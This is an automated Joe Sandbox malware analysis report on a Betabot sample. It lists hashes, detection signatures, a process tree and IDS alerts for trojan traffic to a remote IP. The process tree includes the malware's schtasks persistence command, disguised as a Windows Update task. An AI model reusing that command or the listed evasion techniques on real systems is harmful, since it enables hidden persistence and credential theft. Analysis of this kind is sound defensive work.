Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BbbEtaIxAU.exe

Overview

General Information

Sample Name:BbbEtaIxAU.exe
Analysis ID:760719
MD5:0de785a3d83482ee5b7e3e396a641bc7
SHA1:fc7326166024e8edfec82524e4a1e98041561fa4
SHA256:443095db638f2eb172dbfbe3730407c033b5ec86dde1e8b2f65df703b85cca51
Tags:exeNeurevt
Infos:

Detection

Betabot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Betabot
Snort IDS alert for network traffic
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Overwrites Windows DLL code with PUSH RET codes
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found C&C like URL pattern
Modifies Internet Explorer zone settings
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Contains functionality to hide a thread from the debugger
Hides that the sample has been downloaded from the Internet (zone.identifier)
Potentially malicious time measurement code found
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if Internet connection is working
Disables exception chain validation (SEHOP)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Changes image file execution options
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks for installed Antivirus programs
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • BbbEtaIxAU.exe (PID: 6084 cmdline: C:\Users\user\Desktop\BbbEtaIxAU.exe MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
    • schtasks.exe (PID: 6140 cmdline: "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 712 cmdline: C:\Windows\SysWOW64\WerFault.exe MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2904 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4588 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2888 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4596 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2892 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4756 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4700 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 3208 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 3232 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4964 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2964 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4720 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2872 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4728 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 2296 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4648 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
      • zkqrKAufFycYKMdseGdhuYpyTVNu.exe (PID: 4636 cmdline: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe MD5: 77276DDC82248473D033E2494C438A97)
  • yvneslhpc.exe (PID: 272 cmdline: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
  • yvneslhpc.exe (PID: 5496 cmdline: "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
  • yvneslhpc.exe (PID: 3928 cmdline: "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" MD5: 0DE785A3D83482EE5B7E3E396A641BC7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
    00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
      00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
        0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
          00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
            Click to see the 90 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.WerFault.exe.4e0000.11.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
              9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                  4.3.WerFault.exe.4e0000.16.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                    20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                      Click to see the 108 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.564.70.19.20349701802018784 12/05/22-12:47:50.129126
                      SID:2018784
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349704802018784 12/05/22-12:48:05.503144
                      SID:2018784
                      Source Port:49704
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.850295532016778 12/05/22-12:47:00.505069
                      SID:2016778
                      Source Port:50295
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.58.8.8.858218532016778 12/05/22-12:46:19.368387
                      SID:2016778
                      Source Port:58218
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349700802023765 12/05/22-12:47:43.551273
                      SID:2023765
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.850902532016778 12/05/22-12:47:52.321288
                      SID:2016778
                      Source Port:50902
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.58.8.8.853555532016778 12/05/22-12:47:58.149920
                      SID:2016778
                      Source Port:53555
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349694802023765 12/05/22-12:47:04.219546
                      SID:2023765
                      Source Port:49694
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349694802807970 12/05/22-12:47:04.219546
                      SID:2807970
                      Source Port:49694
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349697802018784 12/05/22-12:47:24.377403
                      SID:2018784
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349697802807970 12/05/22-12:47:24.377403
                      SID:2807970
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349703802023765 12/05/22-12:48:00.735136
                      SID:2023765
                      Source Port:49703
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349696802023765 12/05/22-12:47:16.077326
                      SID:2023765
                      Source Port:49696
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349699802023765 12/05/22-12:47:37.686543
                      SID:2023765
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349694802018784 12/05/22-12:47:04.219546
                      SID:2018784
                      Source Port:49694
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349701802807970 12/05/22-12:47:50.129126
                      SID:2807970
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.854585532016778 12/05/22-12:48:04.170104
                      SID:2016778
                      Source Port:54585
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349693802807970 12/05/22-12:46:58.298151
                      SID:2807970
                      Source Port:49693
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349699802807970 12/05/22-12:47:37.686543
                      SID:2807970
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349692802018784 12/05/22-12:46:55.095514
                      SID:2018784
                      Source Port:49692
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.865323532016778 12/05/22-12:47:14.828602
                      SID:2016778
                      Source Port:65323
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.58.8.8.851441532016778 12/05/22-12:47:08.104904
                      SID:2016778
                      Source Port:51441
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349697802023765 12/05/22-12:47:21.944791
                      SID:2023765
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349700802018784 12/05/22-12:47:43.551273
                      SID:2018784
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349700802807970 12/05/22-12:47:43.551273
                      SID:2807970
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.858472532016778 12/05/22-12:47:45.766359
                      SID:2016778
                      Source Port:58472
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349698802018784 12/05/22-12:47:30.918196
                      SID:2018784
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349693802018784 12/05/22-12:46:58.298151
                      SID:2018784
                      Source Port:49693
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349690802018784 12/05/22-12:46:49.744933
                      SID:2018784
                      Source Port:49690
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.855039532016778 12/05/22-12:47:20.714375
                      SID:2016778
                      Source Port:55039
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349699802018784 12/05/22-12:47:37.686543
                      SID:2018784
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349698802807970 12/05/22-12:47:30.918196
                      SID:2807970
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349695802807970 12/05/22-12:47:12.620984
                      SID:2807970
                      Source Port:49695
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349696802018784 12/05/22-12:47:18.507456
                      SID:2018784
                      Source Port:49696
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.852688532016778 12/05/22-12:47:39.883458
                      SID:2016778
                      Source Port:52688
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.58.8.8.856263532016778 12/05/22-12:47:33.137125
                      SID:2016778
                      Source Port:56263
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349702802807970 12/05/22-12:47:55.956294
                      SID:2807970
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349692802807970 12/05/22-12:46:55.095514
                      SID:2807970
                      Source Port:49692
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349704802807970 12/05/22-12:48:05.503144
                      SID:2807970
                      Source Port:49704
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349690802807970 12/05/22-12:46:49.744933
                      SID:2807970
                      Source Port:49690
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349701802023765 12/05/22-12:47:50.129126
                      SID:2023765
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349702802018784 12/05/22-12:47:55.956294
                      SID:2018784
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349703802018784 12/05/22-12:48:01.952443
                      SID:2018784
                      Source Port:49703
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349695802018784 12/05/22-12:47:12.620984
                      SID:2018784
                      Source Port:49695
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.58.8.8.856682532016778 12/05/22-12:47:26.631484
                      SID:2016778
                      Source Port:56682
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.564.70.19.20349695802023765 12/05/22-12:47:12.620984
                      SID:2023765
                      Source Port:49695
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349702802023765 12/05/22-12:47:54.752098
                      SID:2023765
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349696802807970 12/05/22-12:47:18.507456
                      SID:2807970
                      Source Port:49696
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.564.70.19.20349703802807970 12/05/22-12:48:01.952443
                      SID:2807970
                      Source Port:49703
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: BbbEtaIxAU.exeReversingLabs: Detection: 89%
                      Source: BbbEtaIxAU.exeVirustotal: Detection: 92%Perma Link
                      Antivirus / Scanner detection for submitted sample
                      Source: BbbEtaIxAU.exeAvira: detected
                      Machine Learning detection for sample
                      Source: BbbEtaIxAU.exeJoe Sandbox ML: detected
                      Source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 4.0.WerFault.exe.28ac67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 4.0.WerFault.exe.28ac67a.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.BbbEtaIxAU.exe.3420000.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 13.0.yvneslhpc.exe.cd0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
                      Source: 4.2.WerFault.exe.28ac67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 3.0.yvneslhpc.exe.cd0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
                      Source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 10.0.yvneslhpc.exe.cd0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
                      Source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.7.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.BbbEtaIxAU.exe.bd3da0.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 7.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 15.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.0.BbbEtaIxAU.exe.cd0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
                      Source: BbbEtaIxAU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: BbbEtaIxAU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:58218 -> 8.8.8.8:53
